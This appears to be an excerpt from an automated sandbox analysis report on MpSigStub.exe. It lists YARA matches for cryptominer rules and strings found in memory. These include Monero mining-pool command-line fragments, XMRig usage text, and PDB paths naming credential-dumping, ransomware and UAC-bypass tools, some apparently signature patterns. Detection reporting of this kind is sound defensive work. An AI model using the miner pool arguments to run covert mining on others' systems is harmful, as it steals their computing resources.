Source: Yara match	File source: 00000026.00000003.18294992845.00000138BE1C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330244639.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18353734046.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18300587499.00000138BE28E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18321311969.00000138BE145000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18305060553.00000138BDA90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18320434515.00000138BD905000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351208505.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18315232073.00000138BDD67000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Coinhive miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bcf081b6.67.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdb3329f.123.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcaa73fd.109.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.197.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd4f6df4.69.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.84.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcaa4da9.108.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd193eb1.195.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd19185d.194.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.220.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd223b1a.210.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcf08dba.68.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bde3d286.107.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bceeeac2.66.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338362697.00000138BCE4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329040392.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18415619805.00000138BD881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18344277872.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18409070283.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18297604848.00000138BD4A8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18352805869.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18358332585.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18322216000.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342357735.00000138BDE5C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18319503784.00000138BE66C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418142617.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18323286323.00000138BCB04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306268361.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18348013322.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18291761539.00000138BCE4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18289807011.00000138BEB27000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18317087585.00000138BCA04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18418975958.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18306077924.00000138BCEEA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18349361933.00000138BD221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected BitCoin Miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Found strings related to Crypto-Mining

Show sources

Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: window.exe-acryptonight-ostratum+tcp://monerohash.com:2222-u
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: XMR-Stak-CPU mining software, CPU Version.
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: -o stratum+tcp://mine.moneropool.com:3333 -t 0 -u
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: \NsCpuCNMiner64.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: \NsCpuCNMiner64.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: pool.minexmr.com
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: XMRig 2.15.1-beta

Source:	Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp
Source:	Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp
Source:	Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\binplace.exe source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp
Source:	Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp
Source:	Binary string: he#@1.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: \bin\DownloaderExe.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: 'C:\postmaster\merge\Peasants\Billy.pdb] source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\Crypt\\Stub2005\\Stub2005\\Stub\\Stub\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
